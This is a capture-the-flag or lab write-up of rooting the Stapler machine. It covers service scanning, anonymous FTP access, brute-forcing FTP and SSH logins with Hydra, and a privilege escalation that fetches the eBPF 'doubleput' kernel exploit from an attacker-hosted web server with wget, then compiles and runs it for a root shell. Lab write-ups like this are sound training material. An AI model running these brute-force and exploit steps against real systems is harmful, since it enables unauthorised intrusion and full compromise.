Stapler Machine โ€” FTP Misconfiguration to Kernel Root

Today's lab demonstrated how weak service configuration + credential brute-force + kernel vulnerability can lead to full system compromise.

๐Ÿ”Ž Step 1: Initial Enumeration

Started with full service scan:

nmap -sCV -A โ€” min-rate 1000 192.168.xx.xx

Explanation:

  • -sC โ†’ Default scripts
  • -sV โ†’ Version detection
  • -A โ†’ OS detection + aggressive scan
  • โ€” min-rate 1000 โ†’ Faster scanning
None
None

Findings:

โœ” FTP service running โœ” SSH service running โœ” Target OS: Ubuntu 16.x

๐Ÿ“‚ Step 2: FTP Enumeration

Checked anonymous access:

ftp 192.168.xx.xx

Login as:

Username: anonymous Password: anonymous

โœ” Anonymous login allowed

None

Downloaded available note files from FTP server.

Inside notes, discovered reference to user elly.

๐Ÿ” Step 3: Brute Forcing FTP User

Attempted brute-force against FTP user elly.

After successful login:

ftp 192.168.xx.xx

Logged in as:

Username: elly Password: <discovered_password>

None

๐Ÿ“ Step 4: Extracting Usernames from passwd File

Inside FTP share, found passwd file.

Downloaded it:

mget passwd

None
None
None

Lots of user in passwd file

None

Filtered only valid usernames:

awk -F: '{print $1}' passwd > username.txt

This created a clean list of users for brute force.

None

๐Ÿ’ฃ Step 5: SSH Brute Force

Used Hydra to brute force SSH:

hydra -L username.txt -P username.txt ssh://192.168.xx.xx

Explanation:

  • -L โ†’ Username list
  • -P โ†’ Password list
  • Target: SSH service

Successfully obtained valid SSH credentials.

None

๐Ÿ–ฅ Step 6: SSH Access

Logged in via SSH:

ssh user@192.168.xx.xx

User access gained.

None

โšก Step 7: Privilege Escalation โ€” Kernel Exploit

Checked kernel version:

uname -a

Target was running Ubuntu 16.x โ€” vulnerable kernel version.

None

Searched exploit:

searchsploit ubuntu 16.04

None

Downloaded exploit to Kali:

searchsploit -m <exploit_id>

Transferred to target machine.

On Kali:

python3 -m http.server 8000

None

On target:

wget http://<attacker_ip>:8000/39772.zip

Unzip file in target machine

None

๐Ÿ›  Exploit Execution Steps

1๏ธโƒฃ Extract archive:

tar -xvf exploit.tar

2๏ธโƒฃ Navigate to directory:

cd ebpf

None

3๏ธโƒฃ Compile exploit:

chmod +x compile.sh ./compile.sh

None

4๏ธโƒฃ Execute exploit:

./doubleput

None

๐Ÿ”ฅ Result

โœ” User shell โœ” Kernel exploit executed โœ” Root shell obtained successfully

๐ŸŽฅ Full Practical Demonstration For a complete step-by-step video walkthrough, watch here: